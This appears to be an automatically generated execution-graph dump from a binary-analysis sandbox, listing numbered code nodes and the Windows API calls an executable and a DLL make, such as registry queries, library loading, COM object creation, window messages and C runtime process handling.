                                                                          Total number of Limit Nodes:38
                                                                          execution_graph 13939 d2b4f0 13940 d2b4fc __EH_prolog3 13939->13940 13983 d2b463 GetModuleHandleW 13940->13983 13945 d2b552 #6112 13995 d2b421 #1172 13945->13995 13946 d2b528 #538 14054 d3d91d 13946->14054 13950 d2b543 #800 13952 d2b690 13950->13952 13984 d2b472 GetProcAddress 13983->13984 13985 d2b497 GetVersionExW 13983->13985 13986 d2b485 13984->13986 13987 d3bd2a 13985->13987 13986->13985 13988 d3d4cd 5 API calls 13987->13988 13989 d3bd2f 13988->13989 13990 d3bd33 LoadLibraryW 13989->13990 13991 d2b51d #1202 13989->13991 13992 d3bd42 MessageBoxW exit 13990->13992 13993 d3bd5e GetProcAddress 13990->13993 13991->13945 13991->13946 13992->13993 13993->13991 13993->13992 13996 d2b42f 13995->13996 13997 d2b905 13996->13997 14149 d3f415 13997->14149 13999 d2b914 #540 #4155 StringFromGUID2 wsprintfW RegQueryValueW 14000 d2b992 #540 #540 #538 13999->14000 14001 d2b98c 13999->14001 14003 d2baa8 LoadLibraryW 14000->14003 14002 d2bb81 #800 14001->14002 14150 d3f3c4 14002->14150 14005 d2b9c9 6 API calls 14003->14005 14006 d2babf GetProcAddress 14003->14006 14007 d2bb60 #800 #800 #800 14005->14007 14008 d2ba2b #355 #2507 14005->14008 14010 d2bad1 14006->14010 14007->14002 14012 d2bae3 #800 #641 14008->14012 14013 d2ba61 #3494 #858 #800 #800 #641 14008->14013 14011 d2bb06 #4155 #4155 #940 #1197 14010->14011 14017 d2baff 14010->14017 14015 d2bb3d FreeLibrary 14011->14015 14014 d2bb44 14012->14014 14013->14003 14014->14007 14016 d2bb49 #6398 14014->14016 14015->14014 14016->14007 14017->14015 14169 d3f3e2 14054->14169 14056 d3d929 FormatMessageW 14057 d3d9b4 #540 14056->14057 14058 d3d94c #540 14056->14058 14060 d3dceb 2 API calls 14057->14060 14170 d3dceb 14058->14170 14062 d3d9cb #2810 #922 #858 #800 #1197 14060->14062 14063 d3da13 #800 14062->14063 14064 d3da1d 14063->14064 14064->13950 14149->13999 14153 d3f3a0 14150->14153 14152 d3f3ce 14152->14152 14154 d3f3ab 14153->14154 14155 d3f3a8 14153->14155 14158 d3f4cc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14154->14158 14155->14152 14157 d3f602 14157->14152 14158->14157 14169->14056 14173 d3dcfa 14170->14173 14171 d3dcff wsprintfW 14174 d3d95f 6 API calls 14171->14174 14173->14171 14175 d3dd28 14173->14175 14174->14063 14176 d3dd2e wsprintfW 14175->14176 14176->14174 14364 d2eab0 14365 d2eabc __EH_prolog3 14364->14365 14366 d3de06 2 API calls 14365->14366 14367 d2eac3 14366->14367 14368 d2ead7 14367->14368 14370 d2eae6 14367->14370 14374 d3f3e2 14370->14374 14372 d2eaf2 14 API calls 14373 d2ebcb 14372->14373 14373->14368 14374->14372 14375 d2da30 8 API calls 14380 d2c8a6 ScreenToClient ScreenToClient #3133 14375->14380 14378 d3f3a0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 14379 d2db96 14378->14379 14381 d2c8d8 7 API calls 14380->14381 14381->14378 14382 d395d0 #4704 14383 d2b421 #1172 14382->14383 14384 d395df 14383->14384 14388 d39597 SendMessageW #2855 14384->14388 14387 d395ea SendMessageW 14388->14387 14389 d37ff0 14390 d38036 14389->14390 14438 d39205 14390->14438 14392 d3803d #1662 14393 d3808e 14392->14393 14441 d2e18b SendMessageW 14393->14441 14395 d38095 CoCreateInstance 14396 d380ba 14395->14396 14401 d38137 14396->14401 14457 d3642d CoCreateInstance 14396->14457 14398 d383f4 14399 d38403 14398->14399 14400 d38422 14398->14400 14492 d378da SendMessageW 14399->14492 14494 d2e18b SendMessageW 14400->14494 14401->14398 14442 d37f0b SendMessageW 14401->14442 14405 d3816c 14408 d2b3d0 2 API calls 14405->14408 14406 d38412 14493 d391e9 SendMessageW 14406->14493 14407 d38433 #2644 14409 d3819a 14408->14409 14411 d33e89 2 API calls 14409->14411 14412 d381af 14409->14412 14411->14412 14443 d37f0b SendMessageW 14412->14443 14414 d381eb 14444 d355e4 SendMessageW 14414->14444 14416 d382a6 14445 d37f0b SendMessageW 14416->14445 14417 d3820c 14417->14416 14487 d37f0b SendMessageW 14417->14487 14420 d382d4 14446 d37f0b SendMessageW 14420->14446 14421 d3824a 14488 d37f0b SendMessageW 14421->14488 14424 d38278 14489 d37f0b SendMessageW 14424->14489 14425 d38359 14448 d3db15 14425->14448 14426 d382fc 14430 d38333 14426->14430 14490 d37f0b SendMessageW 14426->14490 14430->14425 14447 d355e4 SendMessageW 14430->14447 14432 d38391 14455 d37f0b SendMessageW 14432->14455 14433 d3835e 14433->14432 14491 d37f0b SendMessageW 14433->14491 14436 d383c6 14456 d37f0b SendMessageW 14436->14456 14439 d39211 14438->14439 14440 d39214 SendMessageW #2857 14438->14440 14439->14440 14440->14392 14441->14395 14442->14405 14443->14414 14444->14417 14445->14420 14446->14426 14447->14425 14449 d3db59 14448->14449 14450 d3db1e LoadLibraryW 14448->14450 14449->14433 14451 d3db37 GetProcAddress 14450->14451 14452 d3db58 14450->14452 14453 d3db51 FreeLibrary 14451->14453 14454 d3db47 14451->14454 14452->14449 14453->14452 14454->14453 14455->14436 14456->14398 14458 d36738 RegOpenKeyW 14457->14458 14459 d364dc GetUserDefaultLCID 14457->14459 14460 d3675e RegEnumKeyW 14458->14460 14468 d366e1 14458->14468 14477 d36514 14459->14477 14464 d36917 RegCloseKey 14460->14464 14465 d36797 RegOpenKeyW 14460->14465 14461 d3f3a0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 14463 d36938 14461->14463 14463->14401 14464->14468 14466 d36912 14465->14466 14467 d367b9 RegQueryValueExW 14465->14467 14466->14401 14469 d36906 RegCloseKey 14467->14469 14470 d367ee 14467->14470 14468->14461 14469->14466 14471 d36800 wsprintfW 14470->14471 14472 d3681c 14470->14472 14471->14472 14473 d2b3d0 2 API calls 14472->14473 14474 d36826 14473->14474 14475 d36847 14474->14475 14476 d33e89 2 API calls 14474->14476 14479 d37a11 41 API calls 14475->14479 14476->14475 14477->14468 14478 d36579 StringFromGUID2 14477->14478 14482 d2b3d0 2 API calls 14477->14482 14484 d33e89 2 API calls 14477->14484 14485 d37a11 41 API calls 14477->14485 14495 d37f0b SendMessageW 14477->14495 14478->14477 14480 d365b5 wsprintfW 14478->14480 14481 d36891 14479->14481 14480->14477 14496 d37f0b SendMessageW 14481->14496 14482->14477 14484->14477 14485->14477 14487->14421 14488->14424 14489->14416 14490->14430 14491->14432 14492->14406 14493->14400 14494->14407 14495->14477 14496->14469 14497 d3edf0 __wgetmainargs 14498 d30d90 #5491 #4451 14499 d30e60 14498->14499 14500 d30dbb #2112 14498->14500 14500->14499 14501 d30ddb #4158 14500->14501 14501->14499 14502 d30de8 #5867 #2109 14501->14502 14502->14499 14503 d30e15 #5996 14502->14503 14503->14499 14504 d30e27 #3477 #6063 #2550 14503->14504 14504->14499 14505 d32eb0 14506 d3db15 3 API calls 14505->14506 14507 d32ebf 14506->14507 14509 d32ece 14507->14509 14510 d32940 14507->14510 14511 d32958 14510->14511 14520 d378ed GetFocus #2859 14511->14520 14513 d32966 14514 d32971 14513->14514 14515 d329d5 14513->14515 14521 d37980 SendMessageW 14514->14521 14515->14509 14517 d32980 14517->14515 14522 d378fa SendMessageW 14517->14522 14519 d329a3 14519->14515 14520->14513 14521->14517 14522->14519 14523 d32050 14524 d2b3d0 2 API calls 14523->14524 14525 d32081 14524->14525 14526 d32096 14525->14526 14528 d33d3b 14525->14528 14540 d33f53 #303 14528->14540 14530 d33d6d #540 14531 d2b3d0 2 API calls 14530->14531 14532 d33de4 14531->14532 14533 d33df9 14532->14533 14541 d33cfc #543 InitializeCriticalSection 14532->14541 14535 d2b3d0 2 API calls 14533->14535 14536 d33e1b 14535->14536 14539 d33e30 #1105 14536->14539 14542 d33cfc #543 InitializeCriticalSection 14536->14542 14539->14526 14540->14530 14541->14533 14542->14539 14543 d32870 14544 d32888 14543->14544 14553 d378ed GetFocus #2859 14544->14553 14546 d32896 14547 d328a1 14546->14547 14548 d328ff 14546->14548 14554 d37980 SendMessageW 14547->14554 14550 d328b0 14550->14548 14555 d378fa SendMessageW 14550->14555 14552 d328d3 14552->14548 14553->14546 14554->14550 14555->14552 14556 6e2f582a 14557 6e2f5839 14556->14557 14558 6e2f5851 14556->14558 14685 6e2f55ef 14557->14685 14558->14557 14566 6e2f5868 _strrchr 14558->14566 14562 6e2f5849 14563 6e2f58f6 _strrchr 14564 6e2f5916 14563->14564 14565 6e2f5941 14563->14565 14609 6e2f636a 14564->14609 14573 6e2f6a31 _unexpected 14 API calls 14565->14573 14566->14563 14570 6e2f58a5 14566->14570 14568 6e2f591e 14571 6e2f5928 14568->14571 14572 6e2f59d2 14568->14572 14691 6e2f6a31 14570->14691 14622 6e2f5a1d 14571->14622 14578 6e2f5602 __freea 14 API calls 14572->14578 14577 6e2f595d 14573->14577 14581 6e2f5965 14577->14581 14582 6e2f5974 14577->14582 14578->14562 14579 6e2f58ba 14579->14572 14580 6e2f5937 14586 6e2f5602 __freea 14 API calls 14580->14586 14585 6e2f5602 __freea 14 API calls 14581->14585 14583 6e2f4ee3 ___std_exception_copy 29 API calls 14582->14583 14588 6e2f597f 14583->14588 14587 6e2f596b 14585->14587 14586->14562 14587->14580 14589 6e2f5a10 14588->14589 14592 6e2f55ef __dosmaperr 14 API calls 14588->14592 14722 6e2f551e IsProcessorFeaturePresent 14589->14722 14600 6e2f5997 14592->14600 14594 6e2f5a1c 14596 6e2f4ee3 ___std_exception_copy 29 API calls 14596->14600 14599 6e2f636a 44 API calls 14599->14600 14600->14589 14600->14596 14600->14599 14601 6e2f59e1 14600->14601 14603 6e2f59cb 14600->14603 14602 6e2f55ef __dosmaperr 14 API calls 14601->14602 14604 6e2f59e6 14602->14604 14605 6e2f5602 __freea 14 API calls 14603->14605 14606 6e2f5a1d 53 API calls 14604->14606 14605->14579 14607 6e2f59fa 14606->14607 14608 6e2f5602 __freea 14 API calls 14607->14608 14608->14587 14610 6e2f6378 14609->14610 14611 6e2f6386 14609->14611 14726 6e2f60a4 14610->14726 14752 6e2f62b3 14611->14752 14618 6e2f63b4 14620 6e2f63d6 14618->14620 14621 6e2f5602 __freea 14 API calls 14618->14621 14619 6e2f60a4 31 API calls 14619->14618 14620->14568 14621->14620 14623 6e2f5a2b 14622->14623 14624 6e2f5a40 14622->14624 14625 6e2f55ef __dosmaperr 14 API calls 14623->14625 14624->14623 14626 6e2f5a4c 14624->14626 14627 6e2f5a56 14624->14627 14628 6e2f5a30 14625->14628 14630 6e2f55dc __dosmaperr 14 API calls 14626->14630 14632 6e2f5a7d 14627->14632 14633 6e2f5a94 14627->14633 14629 6e2f550e __strnicoll 29 API calls 14628->14629 14631 6e2f5a3b 14629->14631 14630->14623 14631->14580 14635 6e2f5602 __freea 14 API calls 14632->14635 15237 6e2f5d5f 14633->15237 14637 6e2f5a85 14635->14637 14640 6e2f5602 __freea 14 API calls 14637->14640 14638 6e2f5ade 14643 6e2f55dc __dosmaperr 14 API calls 14638->14643 14639 6e2f5ab6 14641 6e2f5602 __freea 14 API calls 14639->14641 14684 6e2f5a90 14640->14684 14642 6e2f5abe 14641->14642 14644 6e2f5602 __freea 14 API calls 14642->14644 14645 6e2f5aef __FrameHandler3::FrameUnwindToState 14643->14645 14646 6e2f5ac9 14644->14646 15240 6e2f99e0 14645->15240 14647 6e2f5602 __freea 14 API calls 14646->14647 14647->14684 14650 6e2f5b86 GetLastError 14653 6e2f5595 __dosmaperr 14 API calls 14650->14653 14651 6e2f5b48 14654 6e2f5b4c WaitForSingleObject GetExitCodeProcess 14651->14654 14655 6e2f5bab 14651->14655 14652 6e2f5c21 14656 6e2f4293 __FrameHandler3::FrameUnwindToState 21 API calls 14652->14656 14657 6e2f5b92 14653->14657 14654->14650 14660 6e2f5b65 14654->14660 14658 6e2f5bec 14655->14658 14659 6e2f5bb0 14655->14659 14661 6e2f5c28 14656->14661 14662 6e2f5b9e 14657->14662 14663 6e2f5b97 CloseHandle 14657->14663 14670 6e2f5bf7 14658->14670 14671 6e2f5bf0 CloseHandle 14658->14671 14666 6e2f5bbb 14659->14666 14667 6e2f5bb4 CloseHandle 14659->14667 14668 6e2f5b6f CloseHandle 14660->14668 14669 6e2f5b76 14660->14669 14664 6e2f5b81 14662->14664 14665 6e2f5ba2 CloseHandle 14662->14665 14663->14662 14674 6e2f5602 __freea 14 API calls 14664->14674 14665->14664 14666->14664 14673 6e2f5bbf CloseHandle 14666->14673 14667->14666 14668->14669 14669->14664 14675 6e2f5b7a CloseHandle 14669->14675 14672 6e2f5602 __freea 14 API calls 14670->14672 14671->14670 14676 6e2f5bff 14672->14676 14673->14664 14677 6e2f5bd0 14674->14677 14675->14664 14678 6e2f5602 __freea 14 API calls 14676->14678 14679 6e2f5602 __freea 14 API calls 14677->14679 14680 6e2f5c0b 14678->14680 14681 6e2f5bdc 14679->14681 14682 6e2f5602 __freea 14 API calls 14680->14682 14683 6e2f5602 __freea 14 API calls 14681->14683 14682->14684 14683->14684 14684->14580 14686 6e2f6897 __dosmaperr 14 API calls 14685->14686 14687 6e2f55f4 14686->14687 14688 6e2f550e 14687->14688 15286 6e2f545a 14688->15286 14690 6e2f551a 14690->14562 14697 6e2f6a3e _unexpected 14691->14697 14692 6e2f6a7e 14694 6e2f55ef __dosmaperr 13 API calls 14692->14694 14693 6e2f6a69 HeapAlloc 14695 6e2f58b2 14693->14695 14693->14697 14694->14695 14695->14579 14698 6e2f4ee3 14695->14698 14696 6e2f8989 _unexpected 2 API calls 14696->14697 14697->14692 14697->14693 14697->14696 14699 6e2f4eff 14698->14699 14700 6e2f4ef1 14698->14700 14701 6e2f55ef __dosmaperr 14 API calls 14699->14701 14700->14699 14705 6e2f4f17 14700->14705 14702 6e2f4f07 14701->14702 14703 6e2f550e __strnicoll 29 API calls 14702->14703 14704 6e2f4f11 14703->14704 14704->14589 14707 6e2f9558 14704->14707 14705->14704 14706 6e2f55ef __dosmaperr 14 API calls 14705->14706 14706->14702 14709 6e2f9566 14707->14709 14710 6e2f9574 14707->14710 14708 6e2f55ef __dosmaperr 14 API calls 14711 6e2f957c 14708->14711 14709->14710 14714 6e2f959b 14709->14714 14710->14708 14712 6e2f550e __strnicoll 29 API calls 14711->14712 14713 6e2f58df 14712->14713 14713->14589 14716 6e2f5602 14713->14716 14714->14713 14715 6e2f55ef __dosmaperr 14 API calls 14714->14715 14715->14711 14717 6e2f560d HeapFree 14716->14717 14718 6e2f5637 14716->14718 14717->14718 14719 6e2f5622 GetLastError 14717->14719 14718->14563 14720 6e2f562f __dosmaperr 14719->14720 14721 6e2f55ef __dosmaperr 12 API calls 14720->14721 14721->14718 14723 6e2f552a 14722->14723 14724 6e2f5312 __FrameHandler3::FrameUnwindToState 8 API calls 14723->14724 14725 6e2f553f GetCurrentProcess TerminateProcess 14724->14725 14725->14594 14727 6e2f60be 14726->14727 14728 6e2f60d9 14726->14728 14760 6e2f55dc 14727->14760 14730 6e2f60e5 14728->14730 14731 6e2f6100 GetFileAttributesExW 14728->14731 14734 6e2f55dc __dosmaperr 14 API calls 14730->14734 14732 6e2f6111 GetLastError 14731->14732 14742 6e2f6120 14731->14742 14763 6e2f5595 14732->14763 14735 6e2f60ea 14734->14735 14738 6e2f55ef __dosmaperr 14 API calls 14735->14738 14737 6e2f55ef __dosmaperr 14 API calls 14739 6e2f60cb 14737->14739 14740 6e2f60f2 14738->14740 14741 6e2f550e __strnicoll 29 API calls 14739->14741 14744 6e2f550e __strnicoll 29 API calls 14740->14744 14747 6e2f60d5 14741->14747 14746 6e2f55dc __dosmaperr 14 API calls 14742->14746 14742->14747 14743 6e2f55ef __dosmaperr 14 API calls 14743->14747 14744->14747 14749 6e2f6138 14746->14749 14768 6e2f1015 14747->14768 14748 6e2f6160 14748->14568 14750 6e2f55ef __dosmaperr 14 API calls 14749->14750 14751 6e2f611d 14750->14751 14751->14743 14966 6e2f6231 14752->14966 14756 6e2f62d7 14757 6e2f6214 14756->14757 15181 6e2f6162 14757->15181 14775 6e2f6897 GetLastError 14760->14775 14762 6e2f55e1 14762->14737 14764 6e2f55dc __dosmaperr 14 API calls 14763->14764 14765 6e2f55a0 __dosmaperr 14764->14765 14766 6e2f55ef __dosmaperr 14 API calls 14765->14766 14767 6e2f55b3 14766->14767 14767->14751 14769 6e2f101e IsProcessorFeaturePresent 14768->14769 14770 6e2f101d 14768->14770 14772 6e2f13c3 14769->14772 14770->14748 14965 6e2f1386 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14772->14965 14774 6e2f14a6 14774->14748 14776 6e2f68ad 14775->14776 14777 6e2f68b3 14775->14777 14798 6e2f8530 14776->14798 14781 6e2f68b7 SetLastError 14777->14781 14803 6e2f856f 14777->14803 14781->14762 14783 6e2f6a31 _unexpected 12 API calls 14784 6e2f68e4 14783->14784 14785 6e2f68fd 14784->14785 14786 6e2f68ec 14784->14786 14788 6e2f856f _unexpected 6 API calls 14785->14788 14787 6e2f856f _unexpected 6 API calls 14786->14787 14789 6e2f68fa 14787->14789 14790 6e2f6909 14788->14790 14795 6e2f5602 __freea 12 API calls 14789->14795 14791 6e2f690d 14790->14791 14792 6e2f6924 14790->14792 14794 6e2f856f _unexpected 6 API calls 14791->14794 14808 6e2f6548 14792->14808 14794->14789 14795->14781 14797 6e2f5602 __freea 12 API calls 14797->14781 14813 6e2f8371 14798->14813 14800 6e2f854c 14801 6e2f8567 TlsGetValue 14800->14801 14802 6e2f8555 14800->14802 14802->14777 14804 6e2f8371 _unexpected 5 API calls 14803->14804 14805 6e2f858b 14804->14805 14806 6e2f85a9 TlsSetValue 14805->14806 14807 6e2f68cf 14805->14807 14807->14781 14807->14783 14827 6e2f63dc 14808->14827 14814 6e2f83a1 14813->14814 14818 6e2f839d _unexpected 14813->14818 14814->14818 14819 6e2f82a6 14814->14819 14817 6e2f83bb GetProcAddress 14817->14818 14818->14800 14825 6e2f82b7 ___vcrt_FlsGetValue 14819->14825 14820 6e2f834d 14820->14817 14820->14818 14821 6e2f82d5 LoadLibraryExW 14822 6e2f8354 14821->14822 14823 6e2f82f0 GetLastError 14821->14823 14822->14820 14824 6e2f8366 FreeLibrary 14822->14824 14823->14825 14824->14820 14825->14820 14825->14821 14826 6e2f8323 LoadLibraryExW 14825->14826 14826->14822 14826->14825 14828 6e2f63e8 __FrameHandler3::FrameUnwindToState 14827->14828 14841 6e2f523e EnterCriticalSection 14828->14841 14830 6e2f63f2 14842 6e2f6422 14830->14842 14833 6e2f64ee 14834 6e2f64fa __FrameHandler3::FrameUnwindToState 14833->14834 14846 6e2f523e EnterCriticalSection 14834->14846 14836 6e2f6504 14847 6e2f66cf 14836->14847 14838 6e2f651c 14851 6e2f653c 14838->14851 14841->14830 14845 6e2f5286 LeaveCriticalSection 14842->14845 14844 6e2f6410 14844->14833 14845->14844 14846->14836 14848 6e2f6705 _unexpected 14847->14848 14849 6e2f66de _unexpected 14847->14849 14848->14838 14849->14848 14854 6e2f9bfe 14849->14854 14964 6e2f5286 LeaveCriticalSection 14851->14964 14853 6e2f652a 14853->14797 14861 6e2f9c14 14854->14861 14878 6e2f9c7e 14854->14878 14856 6e2f5602 __freea 14 API calls 14858 6e2f9ca0 14856->14858 14857 6e2f9c47 14859 6e2f9c69 14857->14859 14865 6e2f5602 __freea 14 API calls 14857->14865 14860 6e2f5602 __freea 14 API calls 14858->14860 14863 6e2f5602 __freea 14 API calls 14859->14863 14862 6e2f9cb3 14860->14862 14861->14857 14864 6e2f5602 __freea 14 API calls 14861->14864 14861->14878 14866 6e2f5602 __freea 14 API calls 14862->14866 14867 6e2f9c73 14863->14867 14869 6e2f9c3c 14864->14869 14871 6e2f9c5e 14865->14871 14872 6e2f9cc1 14866->14872 14873 6e2f5602 __freea 14 API calls 14867->14873 14868 6e2f9d3a 14874 6e2f5602 __freea 14 API calls 14868->14874 14882 6e2fbc1b 14869->14882 14870 6e2f9cda 14870->14868 14881 6e2f5602 14 API calls __freea 14870->14881 14910 6e2fbd19 14871->14910 14877 6e2f5602 __freea 14 API calls 14872->14877 14873->14878 14879 6e2f9d40 14874->14879 14880 6e2f9ccc 14877->14880 14878->14856 14878->14880 14879->14848 14922 6e2f9d6f 14880->14922 14881->14870 14883 6e2fbc2c 14882->14883 14909 6e2fbd15 14882->14909 14884 6e2fbc3d 14883->14884 14885 6e2f5602 __freea 14 API calls 14883->14885 14886 6e2fbc4f 14884->14886 14887 6e2f5602 __freea 14 API calls 14884->14887 14885->14884 14888 6e2f5602 __freea 14 API calls 14886->14888 14889 6e2fbc61 14886->14889 14887->14886 14888->14889 14890 6e2fbc73 14889->14890 14892 6e2f5602 __freea 14 API calls 14889->14892 14891 6e2fbc85 14890->14891 14893 6e2f5602 __freea 14 API calls 14890->14893 14894 6e2fbc97 14891->14894 14895 6e2f5602 __freea 14 API calls 14891->14895 14892->14890 14893->14891 14896 6e2fbca9 14894->14896 14897 6e2f5602 __freea 14 API calls 14894->14897 14895->14894 14898 6e2fbcbb 14896->14898 14900 6e2f5602 __freea 14 API calls 14896->14900 14897->14896 14899 6e2fbccd 14898->14899 14901 6e2f5602 __freea 14 API calls 14898->14901 14902 6e2fbcdf 14899->14902 14903 6e2f5602 __freea 14 API calls 14899->14903 14900->14898 14901->14899 14904 6e2fbcf1 14902->14904 14905 6e2f5602 __freea 14 API calls 14902->14905 14903->14902 14906 6e2fbd03 14904->14906 14907 6e2f5602 __freea 14 API calls 14904->14907 14905->14904 14908 6e2f5602 __freea 14 API calls 14906->14908 14906->14909 14907->14906 14908->14909 14909->14857 14911 6e2fbd26 14910->14911 14921 6e2fbd7e 14910->14921 14912 6e2fbd36 14911->14912 14914 6e2f5602 __freea 14 API calls 14911->14914 14913 6e2fbd48 14912->14913 14915 6e2f5602 __freea 14 API calls 14912->14915 14916 6e2f5602 __freea 14 API calls 14913->14916 14918 6e2fbd5a 14913->14918 14914->14912 14915->14913 14916->14918 14917 6e2fbd6c 14920 6e2f5602 __freea 14 API calls 14917->14920 14917->14921 14918->14917 14919 6e2f5602 __freea 14 API calls 14918->14919 14919->14917 14920->14921 14921->14859 14923 6e2f9d7c 14922->14923 14927 6e2f9d9b 14922->14927 14923->14927 14928 6e2fbda7 14923->14928 14926 6e2f5602 __freea 14 API calls 14926->14927 14927->14870 14929 6e2f9d95 14928->14929 14930 6e2fbdb8 14928->14930 14929->14926 14931 6e2fbd82 _unexpected 14 API calls 14930->14931 14932 6e2fbdc0 14931->14932 14933 6e2fbd82 _unexpected 14 API calls 14932->14933 14934 6e2fbdcb 14933->14934 14935 6e2fbd82 _unexpected 14 API calls 14934->14935 14936 6e2fbdd6 14935->14936 14937 6e2fbd82 _unexpected 14 API calls 14936->14937 14938 6e2fbde1 14937->14938 14939 6e2fbd82 _unexpected 14 API calls 14938->14939 14940 6e2fbdef 14939->14940 14941 6e2f5602 __freea 14 API calls 14940->14941 14942 6e2fbdfa 14941->14942 14943 6e2f5602 __freea 14 API calls 14942->14943 14944 6e2fbe05 14943->14944 14945 6e2f5602 __freea 14 API calls 14944->14945 14946 6e2fbe10 14945->14946 14947 6e2fbd82 _unexpected 14 API calls 14946->14947 14948 6e2fbe1e 14947->14948 14949 6e2fbd82 _unexpected 14 API calls 14948->14949 14950 6e2fbe2c 14949->14950 14951 6e2fbd82 _unexpected 14 API calls 14950->14951 14952 6e2fbe3d 14951->14952 14953 6e2fbd82 _unexpected 14 API calls 14952->14953 14954 6e2fbe4b 14953->14954 14955 6e2fbd82 _unexpected 14 API calls 14954->14955 14956 6e2fbe59 14955->14956 14957 6e2f5602 __freea 14 API calls 14956->14957 14958 6e2fbe64 14957->14958 14959 6e2f5602 __freea 14 API calls 14958->14959 14960 6e2fbe6f 14959->14960 14961 6e2f5602 __freea 14 API calls 14960->14961 14962 6e2fbe7a 14961->14962 14963 6e2f5602 __freea 14 API calls 14962->14963 14963->14929 14964->14853 14965->14774 14967 6e2f624f 14966->14967 14968 6e2f6248 14966->14968 14967->14968 14977 6e2f6746 GetLastError 14967->14977 14968->14756 14974 6e2f8436 14968->14974 15178 6e2f823e 14974->15178 14978 6e2f675c 14977->14978 14979 6e2f6762 14977->14979 14980 6e2f8530 _unexpected 6 API calls 14978->14980 14981 6e2f856f _unexpected 6 API calls 14979->14981 14983 6e2f6766 SetLastError 14979->14983 14980->14979 14982 6e2f677e 14981->14982 14982->14983 14984 6e2f6a31 _unexpected 14 API calls 14982->14984 14987 6e2f67fb 14983->14987 14988 6e2f6270 14983->14988 14986 6e2f6793 14984->14986 14989 6e2f67ac 14986->14989 14990 6e2f679b 14986->14990 15012 6e2f4f3d 14987->15012 15004 6e2f91b1 14988->15004 14993 6e2f856f _unexpected 6 API calls 14989->14993 14992 6e2f856f _unexpected 6 API calls 14990->14992 14995 6e2f67a9 14992->14995 14996 6e2f67b8 14993->14996 15000 6e2f5602 __freea 14 API calls 14995->15000 14997 6e2f67bc 14996->14997 14998 6e2f67d3 14996->14998 14999 6e2f856f _unexpected 6 API calls 14997->14999 15001 6e2f6548 _unexpected 14 API calls 14998->15001 14999->14995 15000->14983 15002 6e2f67de 15001->15002 15003 6e2f5602 __freea 14 API calls 15002->15003 15003->14983 15005 6e2f6286 15004->15005 15006 6e2f91c4 15004->15006 15008 6e2f920f 15005->15008 15006->15005 15135 6e2f9e4a 15006->15135 15009 6e2f9237 15008->15009 15010 6e2f9222 15008->15010 15009->14968 15010->15009 15157 6e2f7898 15010->15157 15023 6e2f8ade 15012->15023 15016 6e2f4f57 IsProcessorFeaturePresent 15019 6e2f4f63 15016->15019 15018 6e2f4f4d 15018->15016 15022 6e2f4f76 15018->15022 15053 6e2f5312 15019->15053 15059 6e2f4293 15022->15059 15062 6e2f8a0c 15023->15062 15026 6e2f8b23 15030 6e2f8b2f __FrameHandler3::FrameUnwindToState 15026->15030 15027 6e2f8b60 __FrameHandler3::FrameUnwindToState 15029 6e2f8b91 __FrameHandler3::FrameUnwindToState 15027->15029 15031 6e2f8b7f 15027->15031 15052 6e2f8b69 15027->15052 15028 6e2f6897 __dosmaperr 14 API calls 15028->15027 15033 6e2f8bc7 __FrameHandler3::FrameUnwindToState 15029->15033 15073 6e2f523e EnterCriticalSection 15029->15073 15030->15027 15030->15028 15030->15029 15030->15031 15032 6e2f55ef __dosmaperr 14 API calls 15031->15032 15034 6e2f8b84 15032->15034 15038 6e2f8c04 15033->15038 15039 6e2f8d01 15033->15039 15049 6e2f8c32 15033->15049 15036 6e2f550e __strnicoll 29 API calls 15034->15036 15036->15052 15044 6e2f6746 _unexpected 39 API calls 15038->15044 15038->15049 15040 6e2f8d0c 15039->15040 15078 6e2f5286 LeaveCriticalSection 15039->15078 15043 6e2f4293 __FrameHandler3::FrameUnwindToState 21 API calls 15040->15043 15045 6e2f8d14 15043->15045 15046 6e2f8c27 15044->15046 15048 6e2f6746 _unexpected 39 API calls 15046->15048 15047 6e2f6746 _unexpected 39 API calls 15050 6e2f8c87 15047->15050 15048->15049 15074 6e2f8cad 15049->15074 15051 6e2f6746 _unexpected 39 API calls 15050->15051 15050->15052 15051->15052 15052->15018 15054 6e2f532e __FrameHandler3::FrameUnwindToState 15053->15054 15055 6e2f535a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15054->15055 15056 6e2f542b __FrameHandler3::FrameUnwindToState 15055->15056 15057 6e2f1015 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15056->15057 15058 6e2f5449 15057->15058 15058->15022 15080 6e2f40d0 15059->15080 15063 6e2f8a18 __FrameHandler3::FrameUnwindToState 15062->15063 15068 6e2f523e EnterCriticalSection 15063->15068 15065 6e2f8a26 15069 6e2f8a68 15065->15069 15068->15065 15072 6e2f5286 LeaveCriticalSection 15069->15072 15071 6e2f4f42 15071->15018 15071->15026 15072->15071 15073->15033 15075 6e2f8c79 15074->15075 15076 6e2f8cb1 15074->15076 15075->15047 15075->15050 15075->15052 15079 6e2f5286 LeaveCriticalSection 15076->15079 15078->15040 15079->15075 15081 6e2f410f 15080->15081 15082 6e2f40fd 15080->15082 15092 6e2f3f80 15081->15092 15107 6e2f4198 GetModuleHandleW 15082->15107 15086 6e2f414c 15093 6e2f3f8c __FrameHandler3::FrameUnwindToState 15092->15093 15115 6e2f523e EnterCriticalSection 15093->15115 15095 6e2f3f96 15116 6e2f3fe8 15095->15116 15097 6e2f3fa3 15120 6e2f3fc1 15097->15120 15100 6e2f4167 15128 6e2f41da 15100->15128 15102 6e2f4171 15103 6e2f4185 15102->15103 15104 6e2f4175 GetCurrentProcess TerminateProcess 15102->15104 15105 6e2f41f3 __FrameHandler3::FrameUnwindToState 3 API calls 15103->15105 15104->15103 15106 6e2f418d ExitProcess 15105->15106 15108 6e2f4102 15107->15108 15108->15081 15109 6e2f41f3 GetModuleHandleExW 15108->15109 15110 6e2f4253 15109->15110 15111 6e2f4232 GetProcAddress 15109->15111 15112 6e2f4259 FreeLibrary 15110->15112 15113 6e2f410e 15110->15113 15111->15110 15114 6e2f4246 15111->15114 15112->15113 15113->15081 15114->15110 15115->15095 15117 6e2f3ff4 __FrameHandler3::FrameUnwindToState 15116->15117 15118 6e2f4058 __FrameHandler3::FrameUnwindToState 15117->15118 15123 6e2f4c96 15117->15123 15118->15097 15127 6e2f5286 LeaveCriticalSection 15120->15127 15122 6e2f3faf 15122->15086 15122->15100 15124 6e2f4ca2 __EH_prolog3 15123->15124 15125 6e2f4b61 __DllMainCRTStartup@12 14 API calls 15124->15125 